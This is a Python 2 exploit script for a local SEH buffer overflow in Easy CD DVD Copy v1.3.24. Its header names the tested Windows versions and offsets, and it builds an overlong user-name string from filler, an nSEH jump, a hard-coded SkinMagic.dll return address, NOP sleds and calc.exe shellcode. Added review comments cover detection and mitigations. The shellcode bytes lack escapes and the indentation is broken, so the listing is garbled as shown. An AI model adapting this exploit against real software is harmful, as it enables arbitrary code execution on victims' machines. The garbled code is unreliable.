#!/usr/bin/python
###############################################################################
# Exploit Title : Easy CD DVD Copy v1.3.24 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.divxtodvd.net/index.htm #
# Vulnerable Software: http://www.divxtodvd.net/easy_cd_dvd_copy.exe #
# Tested on OS : Windows XP professional SP3 - (996 bytes offset) #
# Windows 7 Enterprise SP1 - (1008 bytes offset) #
# Windows 10 Professional 64bit - (988 bytes offset) #
# Steps to reproduce : #
# ~ Copy the content of OpenMe.txt #
# ~ Click on Register #
# ~ Paste content in "Enter User Name" field #
###############################################################################

import struct

#root@kali:~# msfvenom -p windows/exec CMD=calc.exe -b "x00" -f python -v shellcode (220 bytes)

# Payload bytes. The generator comment above attributes them to msfvenom's
# windows/exec payload with CMD=calc.exe (220 bytes, with the null byte listed
# as a bad character), i.e. a proof-of-execution marker that only starts the
# calculator.
# NOTE(review): as captured on this page the literals below carry no backslash
# escapes, so they are plain text rather than raw bytes; the listing is not a
# faithful copy of the original.
# Detection: the observable side effect is a child process started by the
# Easy CD DVD Copy process right after text is pasted into its Register
# dialog; process-creation telemetry with parent/child lineage covers it.
shellcode = ""
shellcode += "xbfxc6xdex94x3exdaxd0xd9x74x24xf4x5d"
shellcode += "x31xc9xb1x31x31x7dx13x03x7dx13x83xc5"
shellcode += "xc2x3cx61xc2x22x42x8ax3bxb2x23x02xde"
shellcode += "x83x63x70xaaxb3x53xf2xfex3fx1fx56xeb"
shellcode += "xb4x6dx7fx1cx7dxdbx59x13x7ex70x99x32"
shellcode += "xfcx8bxcex94x3dx44x03xd4x7axb9xeex84"
shellcode += "xd3xb5x5dx39x50x83x5dxb2x2ax05xe6x27"
shellcode += "xfax24xc7xf9x71x7fxc7xf8x56x0bx4exe3"
shellcode += "xbbx36x18x98x0fxccx9bx48x5ex2dx37xb5"
shellcode += "x6fxdcx49xf1x57x3fx3cx0bxa4xc2x47xc8"
shellcode += "xd7x18xcdxcbx7fxeax75x30x7ex3fxe3xb3"
shellcode += "x8cxf4x67x9bx90x0bxabx97xacx80x4ax78"
shellcode += "x25xd2x68x5cx6ex80x11xc5xcax67x2dx15"
shellcode += "xb5xd8x8bx5dx5bx0cxa6x3fx31xd3x34x3a"
shellcode += "x77xd3x46x45x27xbcx77xcexa8xbbx87x05"
shellcode += "x8dx34xc2x04xa7xdcx8bxdcxfax80x2bx0b"
shellcode += "x38xbdxafxbexc0x3axafxcaxc5x07x77x26"
shellcode += "xb7x18x12x48x64x18x37x2bxebx8axdbx82"
shellcode += "x8ex2ax79xdb"

# Layout of the string that the header steps paste into the "Enter User Name"
# field: filler up to the exception-handler record, the record's two fields,
# then the payload between two NOP pads.
# Root cause (presumed from the title; the vulnerable code is not shown): the
# field's contents are copied into a fixed-size stack buffer without a length
# check. The vendor-side fix is to bound that copy.
# 988 is the offset the header lists for Windows 10 Professional 64bit; it
# gives 996 for XP SP3 and 1008 for Windows 7 SP1, so the distance to the
# handler record differs per OS.
buffer = "A" * 988 # Junk
buffer += "xebx14x90x90" # + nSEH (Jump Code)
# The handler field is overwritten with a fixed address inside SkinMagic.dll.
# NOTE(review): a hard-coded address presupposes that the module loads at a
# predictable base and is accepted as a handler target, i.e. presumably it was
# built without ASLR (/DYNAMICBASE) and SafeSEH (/SAFESEH) -- confirm against
# the binary. Those two link options, plus SEHOP and DEP enforced for the
# process, are the mitigations that remove that precondition.
buffer += struct.pack('<L', 0x10037b11) # + SEH (pop ebx # pop eax # ret | [SkinMagic.dll])
buffer += "x90" * 50 # + NOP
buffer += shellcode # + shellcode
buffer += "x90" * 50 # + NOP

# Write the assembled string to OpenMe.txt, the file the header steps copy
# from, and report its length.
# NOTE(review): this is Python 2 (print statement), and the indentation of the
# try/except bodies was lost when the page was captured, so the block does not
# parse as shown.
try:
f=open("OpenMe.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
# The bare except reports every failure, not only I/O errors, with the same
# message, and the file handle is not closed if write() raises.
except:
print "File cannot be created"